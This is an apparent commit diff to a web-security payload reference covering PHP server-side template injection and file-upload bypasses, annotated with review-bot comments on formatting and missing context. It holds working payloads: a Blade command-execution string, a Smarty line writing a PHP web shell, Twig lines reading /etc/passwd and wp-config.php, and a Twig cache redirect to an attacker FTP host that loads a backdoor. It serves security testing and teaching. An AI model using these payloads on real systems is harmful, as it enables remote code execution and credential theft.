Syntax Highlighting SSTI

Swissky 2025-11-15 17:11:42 +01:00
parent 5c0ee4c6d9
commit 832b54fd95
4 changed files with 30 additions and 13 deletions

View file

@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client

View file

@ -22,20 +22,33 @@
## Templating Libraries ## Templating Libraries
| Template Name | Payload Format | | Template Name | Payload Format |
| -------------- | --------- | | --------------- | --------- |
| Laravel Blade | `{{ }}` | | Blade (Laravel) | `{{ }}` |
| Latte | `{var $X=""}{$X}` | | Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` | | Mustache | `{{ }}` |
| Plates | `<?= ?>` | | Plates | `<?= ?>` |
| Smarty | `{ }` | | Smarty | `{ }` |
| Twig | `{{ }}` | | Twig | `{{ }}` |
## Blade
[Official website](https://laravel.com/docs/master/blade)
> Blade is the simple, yet powerful templating engine that is included with Laravel.
The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
```php
{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
```
---
## Smarty ## Smarty
[Official website](https://www.smarty.net/docs/en/) [Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP. > Smarty is a template engine for PHP.
```python ```php
{$smarty.version} {$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3 {php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
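Review bot: the new `## Blade` section gives a command-execution payload but never states when Blade is exposed, i.e. that attacker-controlled text has to reach the template source that Blade compiles (a `{{ }}` expression that merely renders a passed variable is not injectable); one sentence after the official-website quote, or a vulnerable render call like the one in `### Twig - Template Format` further down, would tell readers where to look and what to fix. Two smaller points in the same hunk: the `//deprecated in smarty v3` trailer on the `{php}` line is a note, not Smarty syntax, and with the fence now tagged `php` it will be highlighted as code, so it belongs in prose above the block; and the table now reads `Blade (Laravel)` while the new heading reads `Blade`, so pick one name for both.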
@ -52,7 +65,7 @@
### Twig - Basic Injection ### Twig - Basic Injection
```python ```php
{{7*7}} {{7*7}}
{{7*'7'}} would result in 49 {{7*'7'}} would result in 49
{{dump(app)}} {{dump(app)}}
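Review bot: `php` is the wrong highlighter for this block, which is Twig template syntax rather than PHP; GitHub's highlighter knows `twig`, which colours the `{{ }}` delimiters, whereas the PHP grammar only highlights text inside `<?php` tags, so the change from `python` to `php` gains nothing here. The trailing explanation `would result in 49` on the `{{7*'7'}}` line also belongs in prose, otherwise it reads as part of the payload.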
@ -62,7 +75,7 @@
### Twig - Template Format ### Twig - Template Format
```python ```php
$output = $twig > render ( $output = $twig > render (
'Dear' . $_GET['custom_greeting'], 'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name) array("first_name" => $user.first_name)
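Review bot: `$twig > render (` on the first line of this block is a mangled `$twig->render(`, and `$user.first_name` in the array value is Twig property syntax rather than PHP (`$user->first_name`); since this block is the one place the document shows the vulnerable render call, the PHP should be valid now that the fence is tagged `php`. The `php` tag itself is right for this block, unlike the Twig payload blocks around it.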
@ -76,14 +89,14 @@ $output = $twig > render (
### Twig - Arbitrary File Reading ### Twig - Arbitrary File Reading
```python ```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ "{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}} {{include("wp-config.php")}}
``` ```
### Twig - Code Execution ### Twig - Code Execution
```python ```php
{{self}} {{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
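Review bot: both blocks in this hunk (`### Twig - Arbitrary File Reading` and `### Twig - Code Execution`) are Twig template expressions, so `twig` is the fitting fence tag rather than `php`. The stray `@` after the closing quote in `"{{'/etc/passwd'|file_excerpt(1,30)}}"@` looks like a typo carried over from the original; if it is intentional, explain it in prose, otherwise drop it.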
@ -249,4 +262,5 @@ layout template:
## References ## References
- [Limitations are just an illusion advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
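Review bot: the new reference line is missing a space before the separator (`everywhere- YesWeHack`), whereas every other entry uses ` - ` between title, author and date. The references hunk later in this commit keeps its list in chronological order (2016, 2017, 2021, 2025), so the March 24, 2025 item should follow the March 21, 2024 one here rather than precede it.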

View file

@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)

View file

@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.` * Multiple special characters: `file.jsp/././././.`
* UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`
* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
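Review bot: the new `UTF8 filename` bullet shows a header value but not what it bypasses; the reader cannot tell what the percent-encoded `%0a` inside the `filename*` ext-value is meant to achieve or which server-side parsing behaviour it relies on, so state it the way the two Windows bullets below state the normalisation behaviour, and add what to check (validate the filename after the `filename*` value has been decoded, and reject control characters). Also, RFC 5987 writes the charset token as `UTF-8`; if `UTF8` is deliberate (a lenient parser), say so, otherwise correct the spelling.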